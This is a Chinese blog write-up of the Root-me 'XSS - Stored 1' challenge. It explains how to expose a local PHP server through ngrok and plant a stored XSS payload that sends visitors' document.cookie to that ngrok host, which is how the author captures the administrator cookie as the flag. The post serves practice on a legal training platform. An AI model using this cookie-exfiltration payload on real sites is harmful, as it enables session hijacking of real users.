[Root-me]XSS - Stored 1

最新推荐文章于 2024-05-25 09:25:12 发布
最新推荐文章于 2024-05-25 09:25:12 发布
阅读量2.7k 收藏
点赞数
分类专栏: Rootme
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41918771/article/details/103845969
版权

个人博客地址

http://www.darkerbox.com

欢迎大家学习交流

Root-me网址:

https://www.root-me.org/en/Challenges/Web-Client/XSS-Stored-1

题目描述

Steal the administrator session cookie and use it to validate this chall.
窃取管理员会话cookie并使用它来验证这个挑战

这是一个存储型xss的题目,目的是获得管理员的cookie。

这里应该可以用xsspt.com(公共xss平台)获取管理员cookie。

我没有这样做,我get了一个新知识。

ngrok

这个工具我也不熟,下面如果有不对的地方,请斧正

ngrok应该利用了内网转发的功能。

先在https://dashboard.ngrok.com/signup注册一个账号

登录之后,如图

在这里插入图片描述

一共分四步:写的很详细:

  1. 下载对应系统的安装包
  2. 解压安装包
  3. 使用./ngrop authtoken <your token>命令连接你的账号
  4. 查看帮助信息

首先我们使用以下命令在kali上搭建一个简易的服务器

php -S localhost:9999

在这里插入图片描述
然后你先执行第三步的命令

./ngrop authtoken <your token>

然后再执行下条命令

./ngrok http 9999

在这里插入图片描述
红框中的网址即你外网的地址,这里应该是将这个地址映射到了kali本机的9999端口。
所以我们(在外网)访问这个地址就可以访问内网的kali了

有了url地址,开始做题了

构造payload:

<script>document.write('<img src="http://a76086d7.ngrok.io?cmd='+document.cookie+'" width=0 height=0 border=0 />');</script>

在这里插入图片描述
获取到了我自己的cookie

在这里插入图片描述
几分钟后获得管理员cookie。cookie即flag。
在这里插入图片描述

欢迎大家一起学习交流,共同进步,欢迎加入信息安全小白群

在这里插入图片描述

Vicl1fe
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
root-me:network(一)
qingjie0ng的博客
12-31 1597
前言:部分wp,剩下的有空会补上,属于流量分析题 FTP-authentication 地址:Challenges/Network : FTP - authentication [Root Me : Hacking and Information Security learning platform] (root-me.org) 题目:通过 FTP 实现的经过身份验证的文件交换。恢复用户使用的密码。(FTP请求过程中的流量抓取生成了文件,我们要从其中进行数据包捕获分析) 步骤: 开始挑战,会
XSS(Stored)
kid的博客
05-02 2922
XSS(Stored) 前言 看了一个web的安全视频,里面有说说有的web漏洞都是输入输出的控制问题,虽然感觉说的太笼统了。但确实没什么毛病。sql注入来说,对用户的输入做好处理,对服务端的输出做好处理,对于我这样的菜鸡来说就很难了(字符型注入对单引号转义就感觉好难做啊) XSS也是这样。因为对用户输入控制的不严格,让用户的输入被当做代码执行。这和sql感觉就十分相似了。只不过一个是对数据库一个...
root-me 靶场 Web-Client -01_root me靶场注册,成功入职百度月薪35K
2301_78416543的博客
04-14 259
该表格已被禁用且无法使用。您仍然可以找到一种使用它的方法。
国外27个免费的黑客技术学习平台 Hacker Learning
最新发布
2402_84205067的博客
05-25 821
1. Root Me —闯关.3. Hacker101 Videos — 在线视频.4. InsiderPhD YouTube — 在线视频.5. EchoCTF — 互动学习.6. Vuln Machines —视频和靶场.7. Try2Hack — 互动学习.8. Pentester Land —博客文章.9. Checkmarx — 互动学习.10. Cybrary — 书面内容和实验室.11. RangeForce — 互动练习.12. Vuln Hub — 书面内容和实验室.
RootMe
z4yn:)的博客
10-09 965
RootMe 获取root权限 先Nmap扫全端口,开放了22,80端口 在用Nmap -A 综合扫描指定的开放端口 只能从80端口入手,访问80 尝试访问一下robots.txt文件,不存在 用dirbutser扫网站目录,我一般配合dirb一起扫 两个都扫到一个uploads目录和panel目录 uploads通常用来放上传的文件 访问panel目录是个上传点,直接上传一个反弹shell的PHP脚本 用的是kali自带的PH...
[Root-me]HTTP - Open redirect Writeup
Vicl1fe的博客
12-29 1204
个人博客地址 http://www.darkerbox.com 欢迎大家学习交流 Root-me网址: https://www.root-me.org/en/Challenges/Web-Server/HTTP-Open-redirect 知识点 url重定向 前言 自己以前做过一些,但没写wp。只能写一些还没做过的wp了 这个题考察的url重定向 漏洞利用 页面是这样的。 查看源码发现...
合法练习黑客技术?这15个网站也许可以帮到你
m0_61869253的博客
03-12 875
这是一个争议比较大的问题,有的人会建议先学编程,而有的人会建议先学计算机基础,其实这都是要学的。iOS 7及其以上版本都可以安装并使用这款包含大量安全漏洞的app,这个平台对于移动app开发人员是非常有帮助的,因为网上虽然有很多可以练习黑客技术的网站,但是可以用来练习的移动端app则少之又少。提供了超过五十种难度级别,而且还有一个活跃的在线交流社区,所以HackThis!游戏的目的是为了测试你的应用程序安全技能,游戏中的每个问题都会给你提供一串代码,而你需要在有限的时间内找出这些代码中存在的安全漏洞。
Rootme-WriteUp:来自tryhackme的RootME文章
04-13
RootME-tryhackme 通过0xRar 扫描 nmap -T4 -A -p- MACHINE_IP Nmap scan report for MACHINE_IP Host is up (0.15s latency). Not shown: 65464 closed ports, 69 filtered ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 4a:b9:16:08:84:c2:54:48:ba:5c:fd:3f:22:5f:22:14 (RSA) | 256 a9:a6:86:e8:ec:96:c3:f0:03:cd:16:d5:49
xss-labs-master.rar
05-09
"xss-labs-master.rar" 提供了一个针对XSS漏洞的专项练习平台,旨在帮助初学者及安全爱好者提升对XSS攻击的理解和防御能力。这个靶机资源共分为二十个关卡,由浅入深,逐步引导用户掌握XSS攻防的核心技巧。 一、XSS...
-xsser.me-:XSS平台
03-23
1. **XSS攻击**:XSS(Cross-Site Scripting)是一种常见的Web应用安全漏洞,攻击者通过注入恶意脚本到网页上,当其他用户访问被注入的页面时,恶意脚本被执行,可能导致敏感信息泄露、用户会话劫持等后果。...
jQuery-with-XSS 检测jQuery版本是否存在XSS漏洞
09-29
动态站点会受到一种名为“跨站脚本攻击”(Cross Site Scripting, 安全专家们通常将其缩写成XSS,原本应当是css,但为了和层叠样式表(Cascading Style Sheet,CSS )有所区分,故称XSS)的威胁,而静态站点则完全不受...
rootme:+4500点由Zowlak和Xepher推荐给Root-Me
03-31
rootme:+4500点由Zowlak和Xepher推荐给Root-Me
root_me.zip
04-25
root工具,用来对u8860进行root
Bug Bounty Tip - i春秋Self-XSS变废为宝的奇思妙想
04-30
- **Payload**:`<img src=1 onerror=alert(1)>` 这是一个简单的Self-XSS Payload,通过设置图片源地址为1并指定`onerror`事件触发alert弹窗的方式,可以在用户浏览器中执行JavaScript代码。 - **CSS样式**:通过...
007-Web安全基础3---XSS漏洞(CISP-PTE).pptx
10-18
007-Web安全基础3---XSS漏洞(CISP-PTE).pptx
6 个合法学习黑客技术网站,不用担心查水表!
Karka_的博客
10-10 1304
以上介绍分享的网站,均为外网,其所提供的资源纯属教育用途,不能用于任何违反法律用途。你可以通过对这些网站进行合法测试,以快速提高网络安全技能。56)]如果你想了解更多关于以前黑客是如何攻击和修补漏洞的,那这个网站就是为你准备的,你还可以下载上面的杂志,这些杂志涵盖了过去十几年里世界上最大规模的网络攻击。
[Root-me]Insecure Code Management Writeup
Vicl1fe的博客
12-29 5867
个人博客地址 http://www.darkerbox.com 欢迎大家学习交流 Root-me网址: https://www.root-me.org/en/Challenges/Web-Server/Insecure-Code-Management 知识点 git文件泄露 。。。 既然是git文件泄露,就需要泄露的工具了:https://github.com/internetwache/...
6个黑客教程网站,小白也能成大牛!
2301_76168381的博客
04-02 4290
黑客攻击是一项很难掌握的技能,在很大的程度上要求人们对计算机和软件架构的各种概念和网络系统有深入的了解。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Vicl1fe

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值